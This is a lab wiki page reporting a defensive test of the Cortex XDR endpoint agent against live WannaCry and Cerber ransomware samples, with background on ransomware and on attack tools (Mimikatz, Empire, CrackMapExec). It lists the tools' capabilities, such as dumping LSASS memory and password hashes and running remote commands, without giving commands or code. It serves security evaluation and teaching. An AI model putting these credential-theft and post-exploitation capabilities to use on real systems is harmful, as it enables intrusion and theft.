Endpoint security using Cortex XDR

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Summary

Endpoint security is a critical component of an organization's overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).

Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.

With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.

Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.

In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.

Description

Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization's endpoint infrastructure.

Endpoint security pentesting can include a variety of different techniques and tools, such as:

  • Vulnerability scanning: Identifying known vulnerabilities on endpoint devices
  • Social engineering: Attempting to trick users into providing sensitive information or executing malicious code
  • Application testing: Identifying vulnerabilities in software installed on endpoint devices
  • Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means
  • Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices

The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.

It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.

It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.

Ransomware

Ransomware is a type of malware that encrypts a victim's files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.

Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.

Cerber Ransomware

Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid. Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.

WannaCry Ransomware

WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks. Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days. WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.

Tools

Cortex XDR

Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization's security posture.

Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.

Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization's entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.

The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.

Mimikatz

Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system's memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.

Mimikatz can extract a variety of information, including:

  • Passwords stored in memory
  • Encryption keys
  • Hashes of passwords
  • Kerberos tickets
  • Credentials for services and scheduled tasks

Mimikatz can also be used to perform actions such as:

  • Changing a password for a user account
  • Adding new user account
  • Dumping the LSASS process memory.

Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.

BC-Security / Empire

Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.

Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.

Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.

It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.


Porchetta-Industries / CrackMapExec

CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.

CME can perform various tasks, including:

Enumerating users, groups, and computers on a network Dumping password hashes for offline cracking Executing arbitrary commands or scripts on remote systems Attempting to authenticate to remote systems using a list of provided credentials CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.

It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.

Pentesting With Cortex XDR

Installation

From Cortex XDR, select Endpoints → Agent Installations.
Create a new installation package.
Enter a unique Name and an optional Description to identify the installation package.
Select the Package Type.

Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.

Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.

(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.

Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters. 

Specify the installation package settings.
Create the installation package.

Cortex XDR prepares your installation package and makes it available on the Agent Installations page. 

Download your installation package.

When the status of the package shows Completed, right-click the agent version, and click Download. For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.

For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.

For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.

Execution Phase

We executed the WannaCry and Cerber Ransomware on our Endpoint where the Agent was installed. The Agent blocked the executions and uploaded the data to a webUI. On the WebUI, we were able to analyse the blocked attack and view the processes which would have been generated on a Sandbox called Wildfire.

Used Hardware

Notebook

Used Software

  • Cortex XDR
  • WannaCry Ransomware
  • Cerber Ransomware
  • Gentilkiwi / Mimikatz
  • BC-Security / Empire
  • Porchetta-Industries / CrackMapExec

Results

Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the "Ransomware" section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.

References

Retrieved from "https://wiki.elvis.science/index.php?title=Endpoint_security_using_Cortex_XDR&oldid=11473"